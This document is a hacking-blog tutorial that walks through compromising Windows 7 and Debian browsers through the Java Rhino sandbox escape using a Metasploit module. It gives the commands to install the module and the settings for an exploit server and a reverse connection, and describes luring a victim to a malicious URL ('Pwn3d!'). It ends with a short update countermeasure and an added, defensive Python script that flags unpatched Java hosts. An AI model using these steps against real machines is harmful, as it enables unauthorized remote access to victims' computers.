Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R 1

Victim O.S : Windows 7 SP 1, Linux Debian 6

Exploit Credits : Michael Schierl, Juan Vazquez, Edward D. Teach, Sinn3r

This is a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The quote above is from zerodayinitiative.com. This exploit targets a vulnerability in the Java Runtime Environment; all Java versions 6 and 7 are affected. For details of the affected Java versions, refer to the Oracle advisory (http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html).

Requirements :

1. Java Rhino Exploit (download link) and Exploit.class

Step By Step :

1. Download the Java Rhino exploit from the link above, and then copy it into the following folder:

cp java_rhino.rb /pentest/exploits/framework/modules/exploits/multi/browser/

2. Open your Metasploit console by typing msfconsole in a terminal, then use the exploit you've just added and set up the payload.

3. Next, define the options needed for the attack to launch successfully. Once everything looks good, run the exploit to start the exploit server.

Information :

set srvhost 192.168.8.93 --> attacker ip address

set srvport 80 --> attacker local port to open

set uripath java_rhino --> uripath to send to victim

set lhost 192.168.8.93 --> address for the reverse connection if the attack succeeds

set lport 443 --> local port to handle the victim connection if the attack succeeds

exploit --> run the exploit

4. The picture below is a screenshot from the victim when he/she opened the malicious URL.

5. As soon as the victim opens our malicious link, our Metasploit console gets something interesting.

Note: if you get this error:

Exception handling request: No such file or directory – /opt/framework3/msf3/data/exploits/cve-2011-3544/Exploit.class

see the first comment below for how to solve it.

6. The picture below is from when I tried it on Debian 6 Iceweasel.

Pwn3d!

Countermeasure :

1. Update your Java Runtime to a newer version.
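
To act on this countermeasure you first need to know which machines still run the Java 6 and 7 families named above. The following is an added example, not part of the original tutorial: it classifies captured `java -version` banners. The function names, host names and banners are constructed, and PLACEHOLDER_FIXED is a made-up value that must be replaced with the fixed updates listed in the Oracle advisory.

```python
import re

AFFECTED_MAJORS = {6, 7}  # Java families the page lists as affected
_BANNER = re.compile(r'version "([^"]+)"')

def parse_java_version(banner):
    """Return (major, update) from `java -version` output, or None."""
    m = _BANNER.search(banner)
    if not m:
        return None
    raw = m.group(1)
    # Legacy scheme, e.g. 1.6.0_27 or 1.7.0 (no suffix means update 0)
    legacy = re.fullmatch(r"1\.(\d+)\.\d+(?:_(\d+))?(?:-.*)?", raw)
    if legacy:
        return int(legacy.group(1)), int(legacy.group(2) or 0)
    # Scheme used from Java 9 on, e.g. 11.0.2
    modern = re.fullmatch(r"(\d+)(?:\.\d+)*(?:[-+].*)?", raw)
    return (int(modern.group(1)), 0) if modern else None

def assess(banner, fixed_update):
    """Classify a banner; fixed_update maps major -> first fixed update."""
    parsed = parse_java_version(banner)
    if parsed is None:
        return "unknown"
    major, update = parsed
    if major not in AFFECTED_MAJORS:
        return "not-listed"
    floor = fixed_update.get(major)
    if floor is None:
        return "review"  # affected family, no fixed build supplied
    return "patched" if update >= floor else "vulnerable"

def audit(inventory, fixed_update):
    return {h: assess(b, fixed_update) for h, b in inventory.items()}

# Constructed placeholder, NOT a real fixed build; take it from the advisory.
PLACEHOLDER_FIXED = {6: 40}

# Constructed inventory: host -> banner (`java -version` prints to stderr)
SAMPLE = {
    "ws-01": 'java version "1.6.0_27"',
    "ws-02": 'java version "1.6.0_45"',
    "ws-03": 'java version "1.7.0"',
    "ws-04": 'openjdk version "11.0.2" 2019-01-15',
}

if __name__ == "__main__":
    for host, verdict in audit(SAMPLE, PLACEHOLDER_FIXED).items():
        print(host, verdict)
```

A "review" verdict means the host runs an affected family but no fixed update was supplied for it, so it should be checked against the advisory by hand.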

 

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com